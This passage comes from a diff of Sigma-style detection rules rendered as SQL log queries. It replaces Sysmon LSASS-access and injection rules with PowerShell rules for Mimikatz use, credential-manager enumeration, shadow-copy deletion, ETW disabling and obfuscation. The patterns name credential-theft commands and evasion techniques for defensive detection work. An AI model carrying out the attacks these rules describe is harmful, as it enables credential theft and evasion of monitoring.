'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_susp_win32_shadowcopy.yml" }, { - "title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", + "id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_invoke_obfuscation_via_compress.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "title": "Powershell Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1556.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Winlogon Helper DLL", + "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "status": "experimental", + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_winlogon_helper_dll.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "title": "Service Registry Permissions Weakness Check", + "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", "status": "test", - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_get_acl_service.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh Raj", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.003", - "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.t1003" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", + "title": "Suspicious Hyper-V Cmdlets", + "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.defense_evasion", + "attack.t1564.006" ], "falsepositives": [ - "Likely" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_hyper_v_condlet.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" - ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" - }, - { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ], - "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", + "id": "603c6630-5225-49c1-8047-26c964553e0e", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" ], - "filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_enumerate_password_windows_credential_manager.yml" }, { - "title": "Rare GrantedAccess Flags on LSASS Access", - "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", + "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.exfiltration" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate usage of the cmdlet to forward emails" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage 